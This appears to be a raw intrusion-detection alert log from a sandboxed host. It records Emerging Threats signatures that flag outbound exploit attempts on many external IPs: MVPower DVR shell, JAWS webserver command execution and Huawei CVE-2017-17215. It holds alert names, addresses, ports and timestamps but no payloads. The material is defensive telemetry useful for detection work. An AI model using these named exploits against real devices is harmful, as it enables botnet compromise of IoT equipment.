                                                          192.168.2.2338.173.201.9140430802025883 01/02/24-06:24:30.753564TCP2025883ET EXPLOIT MVPower DVR Shell UCE4043080192.168.2.2338.173.201.91
                                                          192.168.2.2343.192.122.6537710802025883 01/02/24-06:25:42.873893TCP2025883ET EXPLOIT MVPower DVR Shell UCE3771080192.168.2.2343.192.122.65
                                                          192.168.2.2345.63.78.7035444802030092 01/02/24-06:24:24.766885TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3544480192.168.2.2345.63.78.70
                                                          192.168.2.23185.214.242.16237540802025883 01/02/24-06:24:49.039118TCP2025883ET EXPLOIT MVPower DVR Shell UCE3754080192.168.2.23185.214.242.162
                                                          192.168.2.23198.154.232.24259276802030092 01/02/24-06:24:45.021090TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5927680192.168.2.23198.154.232.242
                                                          192.168.2.2334.203.180.1341426802025883 01/02/24-06:24:04.156700TCP2025883ET EXPLOIT MVPower DVR Shell UCE4142680192.168.2.2334.203.180.13
                                                          192.168.2.2323.14.39.9148702802030092 01/02/24-06:25:37.988872TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4870280192.168.2.2323.14.39.91
                                                          192.168.2.2371.80.219.1554798802025883 01/02/24-06:24:23.996859TCP2025883ET EXPLOIT MVPower DVR Shell UCE5479880192.168.2.2371.80.219.15
                                                          192.168.2.23121.11.37.23456696802030092 01/02/24-06:24:50.251380TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5669680192.168.2.23121.11.37.234
                                                          192.168.2.2335.231.230.6033018802030092 01/02/24-06:25:03.820714TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3301880192.168.2.2335.231.230.60
                                                          192.168.2.23173.255.250.6148452802030092 01/02/24-06:24:17.602391TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4845280192.168.2.23173.255.250.61
                                                          192.168.2.23203.198.100.11341360802030092 01/02/24-06:25:25.334124TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4136080192.168.2.23203.198.100.113
                                                          192.168.2.2382.163.53.1537476802030092 01/02/24-06:24:23.976596TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3747680192.168.2.2382.163.53.15
                                                          192.168.2.23198.12.222.11345034802025883 01/02/24-06:24:58.944478TCP2025883ET EXPLOIT MVPower DVR Shell UCE4503480192.168.2.23198.12.222.113
                                                          192.168.2.2394.253.89.2442508802030092 01/02/24-06:23:50.267161TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4250880192.168.2.2394.253.89.24
                                                          192.168.2.23188.128.206.16847120802030092 01/02/24-06:24:13.779989TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4712080192.168.2.23188.128.206.168
                                                          192.168.2.23209.240.113.20338972802030092 01/02/24-06:25:25.193436TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3897280192.168.2.23209.240.113.203
                                                          192.168.2.23104.113.198.15836010802030092 01/02/24-06:24:24.210333TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3601080192.168.2.23104.113.198.158
                                                          192.168.2.2370.121.13.460866802025883 01/02/24-06:24:27.470721TCP2025883ET EXPLOIT MVPower DVR Shell UCE6086680192.168.2.2370.121.13.4
                                                          192.168.2.23156.235.99.3048078372152829579 01/02/24-06:25:03.497384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807837215192.168.2.23156.235.99.30
                                                          192.168.2.23186.132.17.22347340802030092 01/02/24-06:24:18.726816TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4734080192.168.2.23186.132.17.223
                                                          192.168.2.23202.81.229.16957854802025883 01/02/24-06:24:05.844790TCP2025883ET EXPLOIT MVPower DVR Shell UCE5785480192.168.2.23202.81.229.169
                                                          192.168.2.2363.195.193.24042464802030092 01/02/24-06:23:51.372398TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4246480192.168.2.2363.195.193.240
                                                          192.168.2.2323.55.68.9857508802030092 01/02/24-06:25:29.993837TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5750880192.168.2.2323.55.68.98
                                                          192.168.2.2334.206.169.21634808802025883 01/02/24-06:25:00.915047TCP2025883ET EXPLOIT MVPower DVR Shell UCE3480880192.168.2.2334.206.169.216
                                                          192.168.2.232.21.224.12652276802030092 01/02/24-06:25:16.010358TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5227680192.168.2.232.21.224.126
                                                          192.168.2.2396.67.179.140870802030092 01/02/24-06:24:10.828261TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4087080192.168.2.2396.67.179.1
                                                          192.168.2.23104.125.2.9460962802025883 01/02/24-06:24:40.594854TCP2025883ET EXPLOIT MVPower DVR Shell UCE6096280192.168.2.23104.125.2.94
                                                          192.168.2.2334.160.79.11940184802025883 01/02/24-06:25:43.999253TCP2025883ET EXPLOIT MVPower DVR Shell UCE4018480192.168.2.2334.160.79.119
                                                          192.168.2.2313.127.14.18542886802030092 01/02/24-06:24:41.189472TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4288680192.168.2.2313.127.14.185
                                                          192.168.2.23198.44.232.13837024802025883 01/02/24-06:25:43.163000TCP2025883ET EXPLOIT MVPower DVR Shell UCE3702480192.168.2.23198.44.232.138
                                                          192.168.2.2367.212.162.8360502802030092 01/02/24-06:23:51.361230TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6050280192.168.2.2367.212.162.83
                                                          192.168.2.2323.207.79.24432972802030092 01/02/24-06:24:45.082176TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3297280192.168.2.2323.207.79.244
                                                          192.168.2.23185.164.6.4838734802030092 01/02/24-06:23:54.914292TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3873480192.168.2.23185.164.6.48
                                                          192.168.2.2338.132.215.4440936802030092 01/02/24-06:24:13.920460TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4093680192.168.2.2338.132.215.44
                                                          192.168.2.23104.92.147.4650912802025883 01/02/24-06:24:41.035412TCP2025883ET EXPLOIT MVPower DVR Shell UCE5091280192.168.2.23104.92.147.46
                                                          192.168.2.2338.239.158.19649628802030092 01/02/24-06:24:03.470698TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4962880192.168.2.2338.239.158.196
                                                          192.168.2.2364.120.69.4946098802030092 01/02/24-06:24:49.087899TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4609880192.168.2.2364.120.69.49
                                                          192.168.2.2389.31.76.4547048802030092 01/02/24-06:24:08.904729TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4704880192.168.2.2389.31.76.45
                                                          192.168.2.2352.68.208.13645118802025883 01/02/24-06:25:29.707548TCP2025883ET EXPLOIT MVPower DVR Shell UCE4511880192.168.2.2352.68.208.136
                                                          192.168.2.23208.109.173.19843616802030092 01/02/24-06:25:34.668261TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4361680192.168.2.23208.109.173.198
                                                          192.168.2.23199.232.239.4846658802025883 01/02/24-06:24:23.868552TCP2025883ET EXPLOIT MVPower DVR Shell UCE4665880192.168.2.23199.232.239.48
                                                          192.168.2.23202.238.204.21040470802030092 01/02/24-06:24:24.201458TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4047080192.168.2.23202.238.204.210
                                                          192.168.2.23104.69.218.3453078802030092 01/02/24-06:24:30.590605TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5307880192.168.2.23104.69.218.34
                                                          192.168.2.2344.237.111.25343424802025883 01/02/24-06:23:59.006301TCP2025883ET EXPLOIT MVPower DVR Shell UCE4342480192.168.2.2344.237.111.253
                                                          192.168.2.23121.143.178.8245270802030092 01/02/24-06:25:22.173559TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4527080192.168.2.23121.143.178.82
                                                          192.168.2.23172.98.133.4651318802030092 01/02/24-06:25:21.231178TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5131880192.168.2.23172.98.133.46
                                                          192.168.2.2354.199.121.17058798802025883 01/02/24-06:24:19.269485TCP2025883ET EXPLOIT MVPower DVR Shell UCE5879880192.168.2.2354.199.121.170
                                                          192.168.2.23117.20.101.12541464802025883 01/02/24-06:24:32.881657TCP2025883ET EXPLOIT MVPower DVR Shell UCE4146480192.168.2.23117.20.101.125
                                                          192.168.2.23205.164.12.22246902802025883 01/02/24-06:24:20.042564TCP2025883ET EXPLOIT MVPower DVR Shell UCE4690280192.168.2.23205.164.12.222
                                                          192.168.2.2343.139.38.17550990802025883 01/02/24-06:24:04.154188TCP2025883ET EXPLOIT MVPower DVR Shell UCE5099080192.168.2.2343.139.38.175
                                                          192.168.2.2352.218.234.14751138802025883 01/02/24-06:25:02.194486TCP2025883ET EXPLOIT MVPower DVR Shell UCE5113880192.168.2.2352.218.234.147
                                                          192.168.2.2383.148.198.4442066802025883 01/02/24-06:25:42.757624TCP2025883ET EXPLOIT MVPower DVR Shell UCE4206680192.168.2.2383.148.198.44
                                                          192.168.2.23157.245.212.16341682802025883 01/02/24-06:24:14.930071TCP2025883ET EXPLOIT MVPower DVR Shell UCE4168280192.168.2.23157.245.212.163
                                                          192.168.2.2334.120.145.3256908802030092 01/02/24-06:25:06.732120TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5690880192.168.2.2334.120.145.32
                                                          192.168.2.2323.204.125.10656446802030092 01/02/24-06:24:14.743069TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5644680192.168.2.2323.204.125.106
                                                          192.168.2.23193.182.144.15439910802025883 01/02/24-06:25:31.359030TCP2025883ET EXPLOIT MVPower DVR Shell UCE3991080192.168.2.23193.182.144.154
                                                          192.168.2.23184.26.2.23933266802030092 01/02/24-06:25:32.158283TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3326680192.168.2.23184.26.2.239
                                                          192.168.2.2318.155.199.10545054802030092 01/02/24-06:23:54.818570TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4505480192.168.2.2318.155.199.105
                                                          192.168.2.23209.240.113.20338972802025883 01/02/24-06:25:25.193436TCP2025883ET EXPLOIT MVPower DVR Shell UCE3897280192.168.2.23209.240.113.203
                                                          192.168.2.23184.85.178.23639722802025883 01/02/24-06:25:16.029669TCP2025883ET EXPLOIT MVPower DVR Shell UCE3972280192.168.2.23184.85.178.236
                                                          192.168.2.2354.254.143.7760350802025883 01/02/24-06:23:58.484471TCP2025883ET EXPLOIT MVPower DVR Shell UCE6035080192.168.2.2354.254.143.77
                                                          192.168.2.23104.126.126.8152802802030092 01/02/24-06:25:30.150804TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5280280192.168.2.23104.126.126.81
                                                          192.168.2.23104.113.198.15836010802025883 01/02/24-06:24:24.210333TCP2025883ET EXPLOIT MVPower DVR Shell UCE3601080192.168.2.23104.113.198.158
                                                          192.168.2.23188.166.210.13957904802025883 01/02/24-06:25:21.187951TCP2025883ET EXPLOIT MVPower DVR Shell UCE5790480192.168.2.23188.166.210.139
                                                          192.168.2.23178.159.46.9149008802025883 01/02/24-06:25:39.173695TCP2025883ET EXPLOIT MVPower DVR Shell UCE4900880192.168.2.23178.159.46.91
                                                          192.168.2.23183.111.183.23054570802030092 01/02/24-06:25:04.271400TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5457080192.168.2.23183.111.183.230
                                                          192.168.2.2387.106.240.16348362802030092 01/02/24-06:25:18.777402TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4836280192.168.2.2387.106.240.163
                                                          192.168.2.232.19.103.22048104802030092 01/02/24-06:25:04.208897TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4810480192.168.2.232.19.103.220
                                                          192.168.2.2318.154.143.21732888802025883 01/02/24-06:25:38.870167TCP2025883ET EXPLOIT MVPower DVR Shell UCE3288880192.168.2.2318.154.143.217
                                                          192.168.2.23104.99.215.10858622802025883 01/02/24-06:24:54.969765TCP2025883ET EXPLOIT MVPower DVR Shell UCE5862280192.168.2.23104.99.215.108
                                                          192.168.2.2377.40.58.2351878802025883 01/02/24-06:25:02.046176TCP2025883ET EXPLOIT MVPower DVR Shell UCE5187880192.168.2.2377.40.58.23
                                                          192.168.2.2338.181.35.21934712802025883 01/02/24-06:24:09.179650TCP2025883ET EXPLOIT MVPower DVR Shell UCE3471280192.168.2.2338.181.35.219
                                                          192.168.2.2357.180.216.7335048802025883 01/02/24-06:25:30.173193TCP2025883ET EXPLOIT MVPower DVR Shell UCE3504880192.168.2.2357.180.216.73
                                                          192.168.2.23175.27.12.21960064802025883 01/02/24-06:25:32.237664TCP2025883ET EXPLOIT MVPower DVR Shell UCE6006480192.168.2.23175.27.12.219
                                                          192.168.2.2341.0.84.3441028372152835222 01/02/24-06:24:06.080918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102837215192.168.2.2341.0.84.34
                                                          192.168.2.2399.142.66.14860348802030092 01/02/24-06:25:29.576053TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6034880192.168.2.2399.142.66.148
                                                          192.168.2.232.17.176.1145384802030092 01/02/24-06:25:15.290469TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4538480192.168.2.232.17.176.11
                                                          192.168.2.2323.222.136.16659240802025883 01/02/24-06:25:34.867652TCP2025883ET EXPLOIT MVPower DVR Shell UCE5924080192.168.2.2323.222.136.166
                                                          192.168.2.2318.142.2.15938786802025883 01/02/24-06:24:24.307205TCP2025883ET EXPLOIT MVPower DVR Shell UCE3878680192.168.2.2318.142.2.159
                                                          192.168.2.23103.57.209.4560092802030092 01/02/24-06:25:10.115853TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6009280192.168.2.23103.57.209.45
                                                          192.168.2.2372.37.218.19948926802030092 01/02/24-06:24:05.713034TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4892680192.168.2.2372.37.218.199
                                                          192.168.2.2354.87.227.16435480802030092 01/02/24-06:25:22.000530TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3548080192.168.2.2354.87.227.164
                                                          192.168.2.2346.101.163.10735924802030092 01/02/24-06:25:11.820546TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3592480192.168.2.2346.101.163.107
                                                          192.168.2.2369.80.206.8755282802025883 01/02/24-06:24:19.154384TCP2025883ET EXPLOIT MVPower DVR Shell UCE5528280192.168.2.2369.80.206.87
                                                          192.168.2.2358.152.149.559232802030092 01/02/24-06:24:41.116385TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5923280192.168.2.2358.152.149.5
                                                          192.168.2.2354.150.52.14052998802030092 01/02/24-06:24:24.012270TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5299880192.168.2.2354.150.52.140
                                                          192.168.2.23103.39.16.6847170802030092 01/02/24-06:24:15.125482TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4717080192.168.2.23103.39.16.68
                                                          192.168.2.23221.153.44.20137018802025883 01/02/24-06:25:09.681419TCP2025883ET EXPLOIT MVPower DVR Shell UCE3701880192.168.2.23221.153.44.201
                                                          192.168.2.232.21.48.24839876802030092 01/02/24-06:24:51.823067TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3987680192.168.2.232.21.48.248
                                                          192.168.2.2377.242.107.19653440802030092 01/02/24-06:25:25.327513TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5344080192.168.2.2377.242.107.196
                                                          192.168.2.23104.83.91.4142372802030092 01/02/24-06:24:06.101527TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4237280192.168.2.23104.83.91.41
                                                          192.168.2.23162.159.129.10357618802030092 01/02/24-06:24:03.166357TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5761880192.168.2.23162.159.129.103
                                                          192.168.2.23134.0.11.20345208802025883 01/02/24-06:24:03.999636TCP2025883ET EXPLOIT MVPower DVR Shell UCE4520880192.168.2.23134.0.11.203
                                                          192.168.2.23104.80.89.1760656802025883 01/02/24-06:25:31.932213TCP2025883ET EXPLOIT MVPower DVR Shell UCE6065680192.168.2.23104.80.89.17
                                                          192.168.2.2323.33.51.1137284802030092 01/02/24-06:25:10.230054TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3728480192.168.2.2323.33.51.11
                                                          192.168.2.2323.48.76.9154442802030092 01/02/24-06:25:30.270726TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5444280192.168.2.2323.48.76.91
                                                          192.168.2.2352.29.37.5835934802030092 01/02/24-06:25:21.265685TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3593480192.168.2.2352.29.37.58
                                                          192.168.2.2351.138.221.22455554802030092 01/02/24-06:25:00.997015TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5555480192.168.2.2351.138.221.224
                                                          192.168.2.23151.101.7.16645530802025883 01/02/24-06:23:49.491267TCP2025883ET EXPLOIT MVPower DVR Shell UCE4553080192.168.2.23151.101.7.166
                                                          192.168.2.23104.82.113.6149624802030092 01/02/24-06:23:55.139649TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4962480192.168.2.23104.82.113.61
                                                          192.168.2.23104.19.229.17639714802025883 01/02/24-06:24:40.719393TCP2025883ET EXPLOIT MVPower DVR Shell UCE3971480192.168.2.23104.19.229.176
                                                          192.168.2.23123.60.116.9758084802025883 01/02/24-06:24:45.347164TCP2025883ET EXPLOIT MVPower DVR Shell UCE5808480192.168.2.23123.60.116.97
                                                          192.168.2.2374.48.45.14649620802025883 01/02/24-06:24:50.099124TCP2025883ET EXPLOIT MVPower DVR Shell UCE4962080192.168.2.2374.48.45.146
                                                          192.168.2.2313.239.48.11535360802030092 01/02/24-06:24:04.056293TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3536080192.168.2.2313.239.48.115
                                                          192.168.2.23185.85.0.13949486802025883 01/02/24-06:24:38.209929TCP2025883ET EXPLOIT MVPower DVR Shell UCE4948680192.168.2.23185.85.0.139
                                                          192.168.2.23108.186.100.20951226802025883 01/02/24-06:23:54.821481TCP2025883ET EXPLOIT MVPower DVR Shell UCE5122680192.168.2.23108.186.100.209
                                                          192.168.2.2334.225.232.16551466802025883 01/02/24-06:24:15.088251TCP2025883ET EXPLOIT MVPower DVR Shell UCE5146680192.168.2.2334.225.232.165
                                                          192.168.2.23157.70.251.2337718802030092 01/02/24-06:24:27.439650TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3771880192.168.2.23157.70.251.23
                                                          192.168.2.23146.148.255.22835330802030092 01/02/24-06:25:03.972570TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3533080192.168.2.23146.148.255.228
                                                          192.168.2.23107.22.7.9054290802025883 01/02/24-06:25:15.619385TCP2025883ET EXPLOIT MVPower DVR Shell UCE5429080192.168.2.23107.22.7.90
                                                          192.168.2.23194.8.215.9047106802030092 01/02/24-06:25:39.116051TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4710680192.168.2.23194.8.215.90
                                                          192.168.2.2323.208.169.837612802030092 01/02/24-06:24:14.264263TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3761280192.168.2.2323.208.169.8
                                                          192.168.2.2323.198.222.19256304802030092 01/02/24-06:24:18.028834TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5630480192.168.2.2323.198.222.192
                                                          192.168.2.2377.46.139.24443154802025883 01/02/24-06:25:02.038352TCP2025883ET EXPLOIT MVPower DVR Shell UCE4315480192.168.2.2377.46.139.244
                                                          192.168.2.2345.148.36.4256504802030092 01/02/24-06:24:01.272066TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5650480192.168.2.2345.148.36.42
                                                          192.168.2.2352.51.210.25354244802030092 01/02/24-06:25:26.161554TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5424480192.168.2.2352.51.210.253
                                                          192.168.2.2313.227.73.8552698802030092 01/02/24-06:25:34.683145TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5269880192.168.2.2313.227.73.85
                                                          192.168.2.2377.75.231.12448474802025883 01/02/24-06:23:59.226697TCP2025883ET EXPLOIT MVPower DVR Shell UCE4847480192.168.2.2377.75.231.124
                                                          192.168.2.2345.66.79.13355714802030092 01/02/24-06:24:14.281778TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5571480192.168.2.2345.66.79.133
                                                          192.168.2.23111.87.115.15347612802025883 01/02/24-06:25:25.281636TCP2025883ET EXPLOIT MVPower DVR Shell UCE4761280192.168.2.23111.87.115.153
                                                          192.168.2.23171.244.56.10744564802025883 01/02/24-06:24:03.532179TCP2025883ET EXPLOIT MVPower DVR Shell UCE4456480192.168.2.23171.244.56.107
                                                          192.168.2.2334.18.64.5447396802025883 01/02/24-06:24:30.779179TCP2025883ET EXPLOIT MVPower DVR Shell UCE4739680192.168.2.2334.18.64.54
                                                          192.168.2.2349.44.196.20855840802025883 01/02/24-06:24:41.307799TCP2025883ET EXPLOIT MVPower DVR Shell UCE5584080192.168.2.2349.44.196.208
                                                          192.168.2.23209.235.140.22455632802025883 01/02/24-06:24:48.911367TCP2025883ET EXPLOIT MVPower DVR Shell UCE5563280192.168.2.23209.235.140.224
                                                          192.168.2.2334.107.170.11651938802025883 01/02/24-06:24:04.121161TCP2025883ET EXPLOIT MVPower DVR Shell UCE5193880192.168.2.2334.107.170.116
                                                          192.168.2.2335.183.139.12937922802025883 01/02/24-06:25:29.610631TCP2025883ET EXPLOIT MVPower DVR Shell UCE3792280192.168.2.2335.183.139.129
                                                          192.168.2.2323.218.15.4344830802030092 01/02/24-06:24:34.799253TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4483080192.168.2.2323.218.15.43
                                                          192.168.2.23154.213.63.23060686802025883 01/02/24-06:24:37.365549TCP2025883ET EXPLOIT MVPower DVR Shell UCE6068680192.168.2.23154.213.63.230
                                                          192.168.2.2373.116.187.14544290802030092 01/02/24-06:24:46.089608TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4429080192.168.2.2373.116.187.145
                                                          192.168.2.23154.46.166.18836382802030092 01/02/24-06:24:10.948725TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3638280192.168.2.23154.46.166.188
                                                          192.168.2.2366.22.55.12933832802030092 01/02/24-06:23:51.506025TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3383280192.168.2.2366.22.55.129
                                                          192.168.2.23156.235.98.939512372152835222 01/02/24-06:24:15.985357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951237215192.168.2.23156.235.98.9
                                                          192.168.2.2352.31.77.17848046802025883 01/02/24-06:25:05.043017TCP2025883ET EXPLOIT MVPower DVR Shell UCE4804680192.168.2.2352.31.77.178
                                                          192.168.2.2334.242.70.14342204802025883 01/02/24-06:24:43.208181TCP2025883ET EXPLOIT MVPower DVR Shell UCE4220480192.168.2.2334.242.70.143
                                                          192.168.2.23157.52.181.6140930802030092 01/02/24-06:25:29.722171TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4093080192.168.2.23157.52.181.61
                                                          192.168.2.23160.121.60.20546956802025883 01/02/24-06:23:51.701184TCP2025883ET EXPLOIT MVPower DVR Shell UCE4695680192.168.2.23160.121.60.205
                                                          192.168.2.23158.94.0.20659592802025883 01/02/24-06:24:09.082311TCP2025883ET EXPLOIT MVPower DVR Shell UCE5959280192.168.2.23158.94.0.206
                                                          192.168.2.2318.139.66.24949188802025883 01/02/24-06:24:49.080776TCP2025883ET EXPLOIT MVPower DVR Shell UCE4918880192.168.2.2318.139.66.249
                                                          192.168.2.2318.66.27.18250544802030092 01/02/24-06:24:59.193137TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5054480192.168.2.2318.66.27.182
                                                          192.168.2.2334.126.113.7654070802025883 01/02/24-06:25:15.540979TCP2025883ET EXPLOIT MVPower DVR Shell UCE5407080192.168.2.2334.126.113.76
                                                          192.168.2.23212.8.247.7039420802025883 01/02/24-06:24:59.257113TCP2025883ET EXPLOIT MVPower DVR Shell UCE3942080192.168.2.23212.8.247.70
                                                          192.168.2.2318.172.204.12456566802025883 01/02/24-06:24:59.388502TCP2025883ET EXPLOIT MVPower DVR Shell UCE5656680192.168.2.2318.172.204.124
                                                          192.168.2.2352.196.15.13145438802030092 01/02/24-06:25:02.277841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4543880192.168.2.2352.196.15.131
                                                          192.168.2.23203.170.84.9841608802030092 01/02/24-06:24:05.853329TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4160880192.168.2.23203.170.84.98
                                                          192.168.2.23217.160.215.20551516802025883 01/02/24-06:24:23.994544TCP2025883ET EXPLOIT MVPower DVR Shell UCE5151680192.168.2.23217.160.215.205
                                                          192.168.2.23145.236.36.12840926802030092 01/02/24-06:24:59.212800TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4092680192.168.2.23145.236.36.128
                                                          192.168.2.2362.244.41.14754538802030092 01/02/24-06:25:25.284302TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5453880192.168.2.2362.244.41.147
                                                          192.168.2.2338.6.180.18441692802025883 01/02/24-06:25:01.064194TCP2025883ET EXPLOIT MVPower DVR Shell UCE4169280192.168.2.2338.6.180.184
                                                          192.168.2.2323.3.111.16147366802025883 01/02/24-06:25:43.020357TCP2025883ET EXPLOIT MVPower DVR Shell UCE4736680192.168.2.2323.3.111.161
                                                          192.168.2.2377.246.183.3046272802025883 01/02/24-06:24:55.948920TCP2025883ET EXPLOIT MVPower DVR Shell UCE4627280192.168.2.2377.246.183.30
                                                          192.168.2.23212.109.194.4333828802025883 01/02/24-06:24:23.748097TCP2025883ET EXPLOIT MVPower DVR Shell UCE3382880192.168.2.23212.109.194.43
                                                          192.168.2.23107.172.87.20751544802025883 01/02/24-06:24:55.853118TCP2025883ET EXPLOIT MVPower DVR Shell UCE5154480192.168.2.23107.172.87.207
                                                          192.168.2.23139.59.72.23049116802030092 01/02/24-06:25:11.932825TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4911680192.168.2.23139.59.72.230
                                                          192.168.2.2338.181.35.21934372802030092 01/02/24-06:24:01.259878TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3437280192.168.2.2338.181.35.219
                                                          192.168.2.2343.192.122.6537836802030092 01/02/24-06:25:44.376815TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3783680192.168.2.2343.192.122.65
                                                          192.168.2.2361.220.62.14550398802030092 01/02/24-06:24:33.218083TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5039880192.168.2.2361.220.62.145
                                                          192.168.2.23124.160.184.25432982802025883 01/02/24-06:24:49.075744TCP2025883ET EXPLOIT MVPower DVR Shell UCE3298280192.168.2.23124.160.184.254
                                                          192.168.2.2338.173.142.9934518802030092 01/02/24-06:24:45.911157TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3451880192.168.2.2338.173.142.99
                                                          192.168.2.23186.88.83.19454168802025883 01/02/24-06:25:15.957336TCP2025883ET EXPLOIT MVPower DVR Shell UCE5416880192.168.2.23186.88.83.194
                                                          192.168.2.23101.42.248.24039924802030092 01/02/24-06:24:43.377309TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3992480192.168.2.23101.42.248.240
                                                          192.168.2.2334.216.109.859862802025883 01/02/24-06:24:27.341329TCP2025883ET EXPLOIT MVPower DVR Shell UCE5986280192.168.2.2334.216.109.8
                                                          192.168.2.23102.130.122.21740696802030092 01/02/24-06:24:58.885496TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4069680192.168.2.23102.130.122.217
                                                          192.168.2.2323.57.78.17447542802025883 01/02/24-06:25:36.406858TCP2025883ET EXPLOIT MVPower DVR Shell UCE4754280192.168.2.2323.57.78.174
                                                          192.168.2.23104.230.152.22549976802025883 01/02/24-06:24:24.820851TCP2025883ET EXPLOIT MVPower DVR Shell UCE4997680192.168.2.23104.230.152.225
                                                          192.168.2.23166.161.129.1740674802025883 01/02/24-06:24:44.925325TCP2025883ET EXPLOIT MVPower DVR Shell UCE4067480192.168.2.23166.161.129.17
                                                          192.168.2.2375.187.170.24035348802030092 01/02/24-06:24:30.620216TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3534880192.168.2.2375.187.170.240
                                                          192.168.2.2350.212.190.9749434802025883 01/02/24-06:25:07.021195TCP2025883ET EXPLOIT MVPower DVR Shell UCE4943480192.168.2.2350.212.190.97
                                                          192.168.2.23154.12.30.8341074802025883 01/02/24-06:25:38.407130TCP2025883ET EXPLOIT MVPower DVR Shell UCE4107480192.168.2.23154.12.30.83
